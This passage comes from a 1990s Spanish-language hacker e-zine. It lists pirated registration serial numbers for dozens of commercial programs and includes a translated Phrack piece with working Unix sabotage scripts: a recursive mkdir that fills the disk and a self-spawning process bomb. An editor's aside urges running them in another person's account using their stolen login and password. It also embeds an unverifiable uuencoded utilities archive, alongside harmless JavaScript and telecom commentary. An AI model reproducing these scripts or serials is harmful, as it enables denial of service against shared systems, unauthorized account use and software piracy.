~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ok! Fueron mas de 10 y esta revista no es de $#@% Links, pero en verdad que
estos son muy buenos lugares y no podiamos dejar de informarles sobre los
servicios que ofrecen. Sigan en contacto pues en uno de los siguientes numeros
incluiremos una pagina HTML repleta de Links para que la veas en tu Navegador
favorito!

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

CODIGOS DE REGISTRO

Ok, estos codigos no son de programas muy conocidos pero de cualquier manera
alguien podria necesitar uno de estos numeritos... Los mas importantes de
este numero son los cracks para TRUMPWSK 2.1F, Webauthor v1.0, entre otros.

=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*

  

-=| El CrAcK ganador de este numero |=-
Microangelo Version 2.1
Name: RareGaZz
#: S4795050

Microangelo 2.1
Este programa 'shareware' permite manipular iconos de una manera facil y
ademas permite crear cursores animados (ANI) e iconos de 256 colores!
Disponible en: http://www.impactsoft.com
^^^^^^^^^^^^^^^^^^^^^^^^^
=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*

The international OCR - A46IW331561710
The LastByte Memory Manager v2.50 The GuaRDiaN aNGeL CF5AD7D9
The mayor BBS v6.25 - NWGEEGD9J
The reader v4.01 Batman AAAAAJ
The reader v4.01 : name/Mine key/AAAB
The semware editor prerelease - 3001005027
The Troubleshooter v3.51 - 570166
Thedraw v4.62 : A460-004945
Thumbs plus...........name: MicroStar............user code:E87524F5
Thumbsplus 2.0c : name/Kermu! #/7141f9d5
Timbuktu v1.01 Remote : 3120741165
Timbuktu v1.1 for DOS and Windows : 3130078-33EC
Timbuktu v3.1 : 067-591-117-475
Time Organizer 2.0 : TMO-A011043-45
Time slips v5.0 for Windows : 5.10190000638
TKterm v0.15 Batman 276MH60
TKterm v0.15 : name/Me #/GCII233
Toolbook v3.0 : 0740-002321
Topproducer v5.0 for Windows : IS3H-081794-CAE0019264
Total access analyzer 2.02c /MSAccess : ST66162722
Total access speller 1 user /MSAccess : ST42204733
Total access statistics 1.0a /MSAccess: ST77008244
Totally twisted screensaver for Win : BII-00670-6681
Tradewars 2002 v2.0 Batman FB\\D8IP\\EI
Tradewars 2002 v2.0 : name/Me #/M4FE\C^JDH
Transcan v5.0 7e-08a7-81
Treboffer v1.0 : #/622 pw/Password
Trip Maker Road Atlas /win tmd 100 100 10782
Tron v1.06 The GuaRDiaN aNGeLST+44723
Tron v1.06 : name/Me! #/ST+44147
Troubleshooter v3.51 : 570166
True Forms 2.0 : TDA2008000217
True type effects : TEW31-13A2B-01F0KV
Truespace - 310015032904
Truespace 2.0 - 310001025247
Truespace animation v1.0 for Windows : 310001026188
Truespace animation v1.0 for Windows - 3 10 001 027601
Truespace animation v1.0 for Windows 310001026188.310001027601
Truespace Special Edition 1.0 for Win3,95&NT<td>3 10 001 101852
Truespace v2.0 : 3 20 004 0030567
Trumpet winsock 2.1f...............Name: james bond......reg # 24551570
Turbocom/2 v2.0 : 102454202
Turbofast professional v4.2d : 23-HH845
Turbofast professional v4.2d...................23-HH971
Twinbridge v3.3 for Windows : TBCWSYS9409U-109307
Typestry v1.1 for Windows : 478821383
Typestry v1.1 for Windows...........................4144650235
UHS Reader v3.0 : name/Me! #/177371
UHS Reader v3.0The GuaRDiaN aNGeL858562
UHS TSR v1.0 : name/Me! #/411321722622
UHS TSR v1.0 .............name: The GuaRDiaN aNGeL.....s/n: 213641341431
Ultra compressor II archiver, r2-3 PRO: #/2650819804 code/2423
Ultra Edit 32 bit v3.0 THE RIDDLER [EOD]93238625
Ultra Paint : 51736
Uninstaller /win i2237533 i20095616
Uninstaller v3.0 for Windows : VE18530027716
Uninstaller v3.0 for Windows : VE18530027716
Unprotect/DOS 4.2a v646 : name/GaRY D. [UCF] #/00000000138
Upcheck v6.0 : name/Me bbs/XXX #/CMX2330 reg/O541148315876MSEB
Uper queue v3.1 for Windows798-310-00120
Usurper : name/Me bbs/XXX #/541315
Usurper ..................name: Batman.......bbs: Gotham.......s/n: 2602834
Value vision personal inv. mgr v2.0 : VV-W20-2551554
VCL (Virus Construction Lab) - Chiba City
Ventura publisher NL v3.0 : RWNL000029
Versions/VB v1.1 for Windows : 110020000897
VESAVIEW V6.X THE RIDDLER [EOD]rUDF7M7QM
VFast v2.0 beta protocol driver : VFC0D6F2
Virtus Virtual Walkthrough : AWCAA241-000-03F0
Virtus VR : I20095616
Virtus VR /win gwcaa405-000-2aac
Virtus VRI20095616
Vis PRO C/C++ for OS/2 : VPP5015436 or VPP6019281
Vis PRO rexx gold edition for OS/2 : VPR1540827
Visio 3 : 117-287-033446
Visual reality for Windows : VRW02449
Visualage team v2.0 for Windows : 17H7503
Voice type control v2.0 for Windows : 16H9-740
Vueprint v4.0 for Windows : 9202446
Vueprint v4.0 for Windows....9202444....16731549.....10596830....10596831
VuePrint v4.1 : 9202444
VuePro 32 : 8342813
VX Rexx v2.0 for OS/2 : VXR2025401
Walt Disney screensaver for Windows....DSW-30857-2768.....DSW-36523-5758
Watcom SQL netware NLM for Windows : 31600455
Webauthor v1.0 for MS Word v6.0 /Win : 000-17N-22546


0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

JavaScript
~~~~~~~~~~
En este numero presentaremos un codigo javascript que permite dar una
bienvenida a nuestra pagina de acuerdo a la hora. Si el usuario entra a
nuestra pagina a las 12:00pm aparece 'BUENOS DIAS', si llega a las 5:00pm
'BUENAS TARDES' y asi...

El codigo debera ser colocado despues de la etiqueta <BODY> de la pagina.

__________________________________Comienza CODIGO HTML________________________

<SCRIPT LANGUAGE="JavaScript">

function greeting()

{

var today = new Date();

var hrs = today.getHours();

document.writeln("<CENTER>");

if ((hrs >=6) && (hrs <=18))

{

}

else

document.writeln("<BR>");

document.write("<H1>");

if (hrs < 6)

document.write("Buenos Dias");

else if (hrs < 12)


document.write("Buenos Dias");

else if (hrs <= 18)

document.write("Buenas Tardes");

else

document.write("Buenas Noches");


document.writeln("!</H1>");

document.write("Bienvenido, son las ");

dayStr = today.toLocaleString();

i = dayStr.indexOf(' ');

n = dayStr.length;

document.write(dayStr.substring(i+1, n));

document.writeln("</CENTER>");

}

document.write(greeting());


</SCRIPT>
__________________________________Termina CODIGO HTML_________________________


0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

=Trucos para Unix por Shooting Shark=
Texto original de Phrack #6

Sumario: Metodos de sabotage para usarlos en tu sistema UNIX favorito.


Crash The System
----------------
Unix no tiene forma de regular el espacio en disco permitido a cada usuario.
Por esto, casi cualquier usuario puede obtener todo el espacio en disco en el
sistema y efectivamente prevenir que cualquier otro usuario escriba en el
disco. Una simple forma de obtener todo el espacio en el disco es crear un
subdirectorio despues de un subdirectorio hasta que no haya espacio para otro
subdirectorio mas. Aqui hay algunas formas de hacerlo.

1> Crea un archivo con las siguientes lineas:

mkdir subdir
cd subdir
source /u1/mydir/crash

Llamalo crash. La ultima linea ("source /u1/mydir/crash") debe de estar
alterada para que busque el archivo en tu directorio. Si tu directorio
es /home/usuarios/nombre, la ultima linea debera decir "source
/home/usuarios/nombre/crash"
. Despues de grabar el archivo escribe:

(% Simboliza el prompt. En tu sistema puede ser: #, $, *, etc.)

% source crash

y espera...dentro de unos minutos el programa abortara por que no tendra
espacio suficiente en el disco. Tampoco cualquier otro.

2> Si deseas dejar el proceso y colgar (Log off) y el archivo es llamado
crash, escribe:

% nohup source crash &

Este comando empezara el proceso en el Background permitiendote que tu
termines la sesion (LOG OFF).

Haciendo mas lento el sistema
-----------------------------
Hay muchas formas de lograr esto, un ejemplo especifico es crear muchos
procesos en el background. Para hacer esto crea un archivo llamado "slow1"
con las siguientes lineas:

w &
source slow1

Crea un archivo llamado "slow2" con:

source slow1 &
source slow2

Y ejecuta slow2 con:

% slow2 &

Esto creara 25 procesos en el background, cada uno ejecutando 25 procesos mas.
El sistema terminara por inmovilizarse.

[Editor: Para evitar que seas sorprendido, usa estos trucos en la cuenta y
directorio de otra persona. Solo necesitas su Login y Password ;-)]

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=


=SECCION DE SOFTWARE=

En este numero se incluye el archivo UTILS.ZIP que contiene los archivos
CIPHER.COM, HEDIT.EXE y WYPE.COM
Para crear el archivo UTILS.ZIP copia el texto entre los puntos (sin los
puntos) y copialo a un archivo con el nombre UTILS.UUE y usa el programa
UUDECODE (incluido en RareGaZz #1) con la siguiente SINTAXIS:

UUDECODE UTILS.UUE
{Principio de UTILS.UUE}
..............................................................................
begin 644 utils.zip
M4$L#!!0``@`(``!@C"=:G\+:6Q8``'D7```(````5UE012Y#3TU56&M<4]>R
M7_N9G9T'`<+#0#`@A`0$$1`?@(97>%0AB`00!6D%BZ+8D&#;@Q"
("LE62RDJ
MMO4VBEJEML463X/V*H*"
M=4*U(K:*E?LZ4XWM5044![[TI[[X=SY\/_/[-_,
M?%DS>\TLVV<AYVTND5?*BJDK0?%(O=\(2TVT'P/U%RNAJ=$3U,!9M)_9>Q>Y

...

M_025!%8XX$4:F#$%W,@%.PK!CTI5I6JZ]+RV8Y]"Z/E,H+-);T7UV_60$6E$
M&=%&C!%KQ`582#`2H9<$:T(,JIELI!BIT,YT(\/(-@J,_U^N:_KWX]^/?S_^
M]>._`%!+`0(4`!0``@`(``!@C"
=:G\+:6Q8``'D7```(````````````(```
M``````!765!%+D-/35!+`0(4`!0``@`(``!@C"?S@4SN318``%87```*````
M````````(````($6``!#25!(15(N0T]-4$L!`A0`%``"
``@``&",)VVP];-4
M`@``FP0```8``````````0`@````]BP``$Q%04U%(5!+`0(4`!0``@`(``!@
MC"
=\Z.,U@<P```"H`0`)````````````(````&XO``!(141)5"Y%6$502P4&
@``````0`!`#9````%OP```X`+3U;4F%R94=A6GI=/2U=
`
end
..............................................................................
{Fin de UTILS.UUE}

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

(*)(*)(*)(*)(*)(*)
(*) Noti-LOONS (*)
(*)(*)(*)(*)(*)(*)

El editor de esta revista no se hace responsable de las opiniones expresadas
en esta seccion. Los responsables son todos aquellos que envian sus noticias
y comentarios a RareGaZz para su publicacion anonima.

------------------------------------------------------------------------------
Privatizacion de los telefonos en Mexico
------------------------------------------------------------------------------
En los recientes dias se habla mucho de la competencia entre TELMEX y las
nuevas compa§ias formadas por gigantes de las telecomunicaciones como lo son
AT&T y MCI.
Supuestamente ahora si hay "competencia" y el estado intenta dejar de ser
el due§o de uno de los monopolios mas grandes que poseia. Esta paso marca
el fin del socialismo escondido en el que viviamos pero ahora surgen los
imperios capitalistas llamados monopolios que coincidentemente tambien maneja
el Estado.
En algunos lugares de la republica la entrada de la tan llamada competencia
ha sido pospuesta por $intereses$ mas fuertes que la ley. En Baja California
y Sonora maneja los telefonos TELNOR (Telefonos del Noroeste) quien ha
probado ser un ladron descarado haciendo pagar a sus subditos cantidades
tontas por el uso del telefono basados en su "servicio medido".
Compa§eros! Digamos si al advenimiento de la competencia y eliminemos los
monopolios creados por el Estado. Hablen con su politico mas cercano...

------------------------------------------------------------------------------
Baja California a la vanguardia en comunicacion y telecomunicaciones
------------------------------------------------------------------------------
Seguramente han escuchado esa linea algunas veces en la television o habran
leido un mensaje en el periodico mencionan tal haza§a. Pues queridos amigos,
nos estan mintiendo.
Y me refiero especificamente a el anuncio publicado en ZETA (Baja California)
pagina 8 seccion-A publicado el Lunes 3 de marzo de 1997 diciendo que B.C.
"cuenta con una red de computo robusta, de cobertura estatal, a la que se
encuentran conectadas mas de mil estaciones de trabajo"
Jah! jAh! jaH!
Esto lectores, es pura mentira de un gobierno sin escrupulos que aprovecha el
exito amarillista de las redes como Internet y desea atraer afiliados a el
mintiendo solamente.
"Teniendo como base esta infraesctura...El gobierno de Baja California se
integra a la red global..."
Jah! Otra vez mas, mienten.

Las computadoras de Baja California se encuentran en esta direccion:
www.baja.gob.mx
Y creian que me la iba a creer...

Esta direccion es aparte de un poco exagerada, Falsa! El gobierno no tiene
ni un solo servidor en esa direccion, pero eso si, le pago a la compa§ia
Telefonos del Noroeste establecida en ese estado una modica cantidad de
billetes para que les pusieran un nombre de dominio que aparentara que el
Estado de Baja California de hecho tenia redes de gran tama§o.
Ahora bien, por que con la compa§ia de Telefonos?
Pues amigos, el gobierno le permite cobrar tarifas exageradas por cada minuto
despues de un limite de tarifa plana. Y si eso no fuera poco, bloquea la
entrada de la competencia para seguir con el monopolio panista. Guahgk! me
dan asco...

------------------------------------------------------------------------------
COMDEX
------------------------------------------------------------------------------
Lo nuevo en Computadoras y sistemas? Desde luego amigos...que NO!

Estas exposiciones de productos son COMERCIALES unicamente, por eso, las
nuevas tecnologias permanecen al margen mientras se difunden los comerciantes
que tienen las tiendas retacadas con su producto.

------------------------------------------------------------------------------
PC NOTICIAS
------------------------------------------------------------------------------
El articulo "Seguridad en Internet" que aparecio en PC-NOTICIAS de el mes
de Marzo fue publicado bajo el nombre de RareTrip quien es el editor de esta
revista como una forma de ganar adeptos a este tipo de articulos y asi,
hacer conocida nuestra revista. Asi pues, el texto Seguridad en Internet de
el numero 1 de RareGaZz NO FUE PIRATEADO por nuestra revista, simplemente
decidimos publicar un articulo de esta revista.
Gracias a Rafael Rojas (RROJAS@TELNOR.NET) quien nos dejo participar de
forma anonima para la revista en la que el colabora mas no edita (como el
mismo nos hizo saber).
Si aparecen otros articulos de RareGaZz en Pc-Noticias sera cuando RareGaZz
apruebe dicha accion unicamente; asi pues, si en RareGaZz aparece un articulo
publicado en Pc-Noticias sera cuando Pc-Noticias nos conceda el derecho de
hacerlo.

------------------------------------------------------------------------------
EXIGAN SUS DERECHOS
------------------------------------------------------------------------------
Si tu obtienes el acceso a Internet por medio de un ISP como tu compa§ia
telefonica o COMPUNET, etc. no permitas que te niege el acceso a la red una
se§al de ocupado cuando quieras entrar a el servidor de la compa§ia.
Algunas veces tenemos que esperar horas y otras solo minutos, pero la
obligacion de la compa§ia que presta el servicio es ofrecerlo las 24 horas
y mantener las interrupciones debido a mantenimiento al minimo.

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

Diviertanse y hasta el proximo numero...

________
( )____
Editor = raretrip ( RareGaZz )
Graficas = TvAzteca ( La Droga Sin )
Comercializacion = Teloenvicia ( BAJON )
Color = LSD ( __ )
Animo = Cannabis Sativa . (_____) (____)
Colaboradores = Le PompeItor - KillerBot . ? . ()
Texto = click,click,click __ ()
Comentario = Alguien podria conseguirme / \ ()
la primera version PGP?? |_ _|
|(0)||(0)|
/|_ \/ _|\
|| | == | ||
|| \____/ ||
///\ !! /\\\
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-!!!-!-=-=-!-!!!-=-=-=-=-=-=-=-

RareGaZz
<<::La Droga sin Bajon::>>

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT